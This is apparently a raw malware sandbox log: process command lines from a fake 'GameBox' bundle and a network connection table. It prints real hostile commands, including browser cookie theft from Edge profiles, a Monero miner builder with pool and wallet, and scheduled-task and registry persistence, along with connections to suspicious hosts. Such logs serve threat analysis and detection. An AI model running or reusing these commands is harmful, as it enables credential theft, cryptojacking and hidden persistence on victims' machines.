"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-RK9I4.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RK9I4.tmp\MediaBurner2.tmp" /SL5="$10482,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-AQHLT.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AQHLT.tmp\VPN.tmp" /SL5="$10448,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5452 -ip 5452
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3948 -ip 3948
C:\Users\Admin\AppData\Local\Temp\is-T6J2O.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-T6J2O.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 828
C:\Users\Admin\AppData\Roaming\2435136.exe
"C:\Users\Admin\AppData\Roaming\2435136.exe"
C:\Users\Admin\AppData\Local\Temp\tmp70CC_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp70CC_tmp.exe"
C:\Users\Admin\AppData\Roaming\1938431.exe
"C:\Users\Admin\AppData\Roaming\1938431.exe"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Roaming\6065002.exe
"C:\Users\Admin\AppData\Roaming\6065002.exe"
C:\Users\Admin\AppData\Roaming\8350537.exe
"C:\Users\Admin\AppData\Roaming\8350537.exe"
C:\Users\Admin\AppData\Roaming\1327737.exe
"C:\Users\Admin\AppData\Roaming\1327737.exe"
C:\Users\Admin\AppData\Local\Temp\is-4U0CE.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4U0CE.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\AppData\Local\Temp\is-LC5O9.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-LC5O9.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 552 -p 5300 -ip 5300
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 26CF3E2ECC50E4699D17F7E882A8043B C
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5300 -s 2412
C:\Users\Admin\AppData\Local\Temp\C247.exe
C:\Users\Admin\AppData\Local\Temp\C247.exe
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2612 -ip 2612
C:\Users\Admin\AppData\Local\Temp\is-SNUI3.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-SNUI3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\AppData\Local\Temp\D275.exe
C:\Users\Admin\AppData\Local\Temp\D275.exe
C:\Users\Admin\AppData\Local\Temp\is-U2RQS.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-U2RQS.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 2432
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\AppData\Local\Temp\is-HMBMJ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HMBMJ.tmp\Setup.tmp" /SL5="$3063C,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-SNUI3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\AppData\Local\Temp\is-T1Q3M.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T1Q3M.tmp\Setup.tmp" /SL5="$1064E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-U2RQS.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6184 -ip 6184
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 276
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\EFA2.exe
C:\Users\Admin\AppData\Local\Temp\EFA2.exe
C:\Users\Admin\AppData\Local\Temp\F272.exe
C:\Users\Admin\AppData\Local\Temp\F272.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-QP076.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C93F7E461A4FE0CD458E353576DF6DD6 C
C:\Users\Admin\AppData\Local\Temp\232.exe
C:\Users\Admin\AppData\Local\Temp\232.exe
C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe
"C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-QP076.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 53E2D7A98B698BA90F1A0E0698C518AF
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-4U0CE.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-4U0CE.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 5244 -ip 5244
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 6536 -ip 6536
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6536 -s 2412
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 296
C:\Users\Admin\AppData\Local\Temp\1E47.exe
C:\Users\Admin\AppData\Local\Temp\1E47.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 1492 -ip 1492
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 280
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files\Windows Sidebar\JDVIQAUHIO\ultramediaburner.exe
"C:\Program Files\Windows Sidebar\JDVIQAUHIO\ultramediaburner.exe" /VERYSILENT
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\is-V6BD4.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V6BD4.tmp\ultramediaburner.tmp" /SL5="$60280,281924,62464,C:\Program Files\Windows Sidebar\JDVIQAUHIO\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\95-851b7-c53-befb3-2182a7717cd27\Refanojapae.exe
"C:\Users\Admin\AppData\Local\Temp\95-851b7-c53-befb3-2182a7717cd27\Refanojapae.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 6344 -ip 6344
C:\Users\Admin\AppData\Local\Temp\d4-001ce-5c9-a609d-d7e0c01cc2615\Typokyniki.exe
"C:\Users\Admin\AppData\Local\Temp\d4-001ce-5c9-a609d-d7e0c01cc2615\Typokyniki.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6344 -s 880
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 6804 -ip 6804
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6804 -s 2412
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\is-QP076.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-QP076.tmp\{app}\vdi_compiler"
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 280
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa42de46f8,0x7ffa42de4708,0x7ffa42de4718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{0e59043d-6bd7-3d48-a220-b17f423f415e}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "41aa"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffa42de46f8,0x7ffa42de4708,0x7ffa42de4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\afuzpqgt.zof\GcleanerEU.exe /eufive & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4gh4cvlz.mcc\LivelyScreenReLou1.9.exe & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\21400odt.mik\installer.exe /qn CAMPAIGN="654" & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\afuzpqgt.zof\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\afuzpqgt.zof\GcleanerEU.exe /eufive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0f0trtmx.rnh\ebook.exe & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0soyi010.4av\ufgaa.exe & exit
C:\Users\Admin\AppData\Local\Temp\21400odt.mik\installer.exe
C:\Users\Admin\AppData\Local\Temp\21400odt.mik\installer.exe /qn CAMPAIGN="654"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\4gh4cvlz.mcc\LivelyScreenReLou1.9.exe
C:\Users\Admin\AppData\Local\Temp\4gh4cvlz.mcc\LivelyScreenReLou1.9.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 6884 -ip 6884
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 276
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\03gmj4hl.j0e\anyname.exe & exit
Network
| Country | Destination | Domain | Proto |
| N/A | 51.124.78.146:443 | | tcp |
| N/A | 20.190.159.134:443 | | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | | tcp |
| N/A | 20.189.118.208:80 | | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
